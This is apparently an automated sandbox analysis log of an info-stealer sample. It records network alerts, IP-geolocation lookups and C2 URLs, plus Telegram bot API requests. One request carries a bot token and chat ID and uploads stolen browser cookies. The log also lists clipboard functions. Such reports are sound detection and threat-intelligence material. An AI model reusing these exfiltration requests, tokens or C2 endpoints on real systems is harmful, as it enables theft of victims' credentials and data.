Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:55431 -> 104.21.80.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:55420 -> 104.21.80.1:443
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49705 version: TLS 1.0
                Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:55414 version: TLS 1.0
                Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_003222EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile | 0_2_003222EE
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:376483%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:32:35%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20376483%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:376483%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:42:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20376483%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
                Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
                Source: unknown | HTTP traffic detected: POST /bot7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg/sendDocument?chat_id=1886630858&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd326c5f9c7285 | Host: api.telegram.org | Content-Length: 1279
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Sat, 11 Jan 2025 00:27:54 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Sat, 11 Jan 2025 00:28:09 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: ectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4526700849.0000000000435000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: ectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4526688861.0000000000434000.00000040.80000000.00040000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
                Source: ectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4526688861.0000000000434000.00000040.80000000.00040000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.0000000003496000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
                Source: ectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4526700849.0000000000435000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: ectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4526688861.0000000000434000.00000040.80000000.00040000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
                Source: RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4532685097.0000000004313000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002D46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
                Source: RegSvcs.exe, 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002D46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002D46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:376483%0D%0ADate%20a
                Source: RegSvcs.exe, 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg/sendDocument?chat_id=1886
                Source: RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4532685097.0000000004313000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4532685097.0000000004313000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4532685097.0000000004313000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: RegSvcs.exe, 00000007.00000002.4529357872.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000034E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002E1D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000034AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002D46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.000000000333F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
                Source: ectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.000000000333F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4526700849.0000000000435000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: RegSvcs.exe, 00000007.00000002.4529357872.0000000003369000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002D46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.0000000003369000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4532685097.0000000004313000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: RegSvcs.exe, 00000007.00000002.4529357872.00000000034E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000034DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
                Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 55451 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 55474 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 55432 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55494
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55451
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55474
                Source: unknown | Network traffic detected: HTTP traffic on port 55414 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55431
                Source: unknown | Network traffic detected: HTTP traffic on port 55482 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 55463 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 55494 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55539
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55414
                Source: unknown | Network traffic detected: HTTP traffic on port 55431 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55432
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55499
                Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55463
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55420
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55482
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknown | Network traffic detected: HTTP traffic on port 55443 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknown | Network traffic detected: HTTP traffic on port 55420 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 55539 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknown | Network traffic detected: HTTP traffic on port 55499 -> 443
                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49749 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:55499 version: TLS 1.2
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_00324164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 0_2_00324164
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_00094164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 2_2_00094164
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_00323F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard | 0_2_00323F66
